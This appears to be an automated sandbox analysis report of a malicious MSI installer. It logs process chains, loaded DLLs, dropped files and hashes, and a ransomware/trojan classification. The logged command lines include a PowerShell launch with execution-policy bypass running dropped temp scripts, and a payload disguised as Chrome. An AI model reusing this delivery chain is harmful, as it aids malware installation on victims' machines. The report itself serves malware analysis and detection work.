Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA56B3C	5_2_00007FFDFBA56B3C
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA65290	5_2_00007FFDFBA65290
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA6BA60	5_2_00007FFDFBA6BA60
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA4FA60	5_2_00007FFDFBA4FA60
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA4B2C8	5_2_00007FFDFBA4B2C8
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA64A10	5_2_00007FFDFBA64A10
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA769A0	5_2_00007FFDFBA769A0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7C0E8	5_2_00007FFDFBA7C0E8
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA61120	5_2_00007FFDFBA61120
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA4E8D0	5_2_00007FFDFBA4E8D0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA75010	5_2_00007FFDFBA75010
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA5E810	5_2_00007FFDFBA5E810
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA73808	5_2_00007FFDFBA73808
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7C7E0	5_2_00007FFDFBA7C7E0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA757E0	5_2_00007FFDFBA757E0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7A038	5_2_00007FFDFBA7A038
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA6AFD0	5_2_00007FFDFBA6AFD0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA4D7B0	5_2_00007FFDFBA4D7B0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA567BC	5_2_00007FFDFBA567BC
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA597A0	5_2_00007FFDFBA597A0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA67714	5_2_00007FFDFBA67714
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA65F40	5_2_00007FFDFBA65F40
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA61680	5_2_00007FFDFBA61680
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA5D660	5_2_00007FFDFBA5D660
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA4C6B0	5_2_00007FFDFBA4C6B0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7FEBA	5_2_00007FFDFBA7FEBA
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA64E50	5_2_00007FFDFBA64E50
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA5C500	5_2_00007FFDFBA5C500
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7AD0C	5_2_00007FFDFBA7AD0C
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA56464	5_2_00007FFDFBA56464
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA62CA0	5_2_00007FFDFBA62CA0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFE13207238	5_2_00007FFE13207238
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64568E2A0	7_2_00007FF64568E2A0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645691270	7_2_00007FF645691270
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64574FF00	7_2_00007FF64574FF00
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6456C9260	7_2_00007FF6456C9260
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6456D0330	7_2_00007FF6456D0330
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64579F660	7_2_00007FF64579F660
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6456CB6F0	7_2_00007FF6456CB6F0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645732280	7_2_00007FF645732280
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645760280	7_2_00007FF645760280
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645794A90	7_2_00007FF645794A90
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645729690	7_2_00007FF645729690
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6457C095C	7_2_00007FF6457C095C
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64572FD80	7_2_00007FF64572FD80
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645762980	7_2_00007FF645762980
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6456FDC80	7_2_00007FF6456FDC80
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64568C440	7_2_00007FF64568C440
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64569C840	7_2_00007FF64569C840
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6456BDD30	7_2_00007FF6456BDD30
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645717880	7_2_00007FF645717880
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645805CB0	7_2_00007FF645805CB0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64568EBA0	7_2_00007FF64568EBA0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64572E820	7_2_00007FF64572E820
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645805C30	7_2_00007FF645805C30
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645795B40	7_2_00007FF645795B40
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF64576DB70	7_2_00007FF64576DB70
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645766B80	7_2_00007FF645766B80
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF6456D37E0	7_2_00007FF6456D37E0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 7_2_00007FF645681BD0	7_2_00007FF645681BD0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: String function: 00007FF6456B4F50 appears 31 times
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: String function: 00007FF6457E4A90 appears 188 times

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7916 -s 580

Source: xmpp.dll.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: chrome.exe.5.dr	Static PE information: Number of sections : 12 > 10
Source: xmpp.dll.1.dr	Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: Number of sections : 13 > 10
Source: chrome_elf.dll.5.dr	Static PE information: Number of sections : 14 > 10

Source: ust_019821730-0576383.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs ust_019821730-0576383.msi
Source: ust_019821730-0576383.msi	Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs ust_019821730-0576383.msi

Source: chrome.exe.5.dr	Binary string: \Device\DeviceApi
Source: chrome.exe.5.dr	Binary string: PathSystemDriveSystemRootTEMPTMPCHROME_CRASHPAD_PIPE_NAMEprocessIdtaglockdownLeveljobLeveldesiredIntegrityLeveldesiredMitigationsplatformMitigationscomponentFiltersappContainerSidappContainerCapabilitiesappContainerInitialCapabilitieslowboxSidpolicyRulesdisabledenableddisconnectCsrsszeroAppShimhandlesToCloseLockdownLimitedInteractiveRestricted Same AccessRestricted Non AdminLimited UserUnprotectedS-1-16-16384 SystemS-1-16-12288 HighS-1-16-8192 MediumS-1-16-6144 Medium LowS-1-16-4096 LowS-1-16-2048 Below LowS-1-16-0 Untrusted%016llx%016llx%016llx%08lxp[%d] == %xp[%d] == %pp[%d] & %x(p[%d], '%ls')exactprefixscanendsaskBrokerdenyalarmfakeSuccessfakeDeniedUnusedPing1Ping2NtOpenFileNtSetInfoRenameGdiDllInitializeGetStockObjectRegisterClassW*\windows_shell_global_counters\Device\DeviceApi\Device\KsecDDALPC Port
Source: chrome.exe.5.dr	Binary string: \??\pipe\\\.\\Device\\Device\HarddiskVolume\Device\\/?/?\\??\ntdll.dllntdll.dllNtOpenProcessNtOpenProcessTokenNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExkernel32.dll
Source: chrome.exe.5.dr	Binary string: \Device\KsecDD

Source: classification engine

Classification label: mal100.rans.troj.evad.winMSI@12/187@0/0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FFDFBA4A690 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,

5_2_00007FFDFBA4A690

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CMLE308.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7916

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF041BD2223697B06A.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: ust_019821730-0576383.msi	ReversingLabs: Detection: 28%
Source: ust_019821730-0576383.msi	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ust_019821730-0576383.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7916 -s 580
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
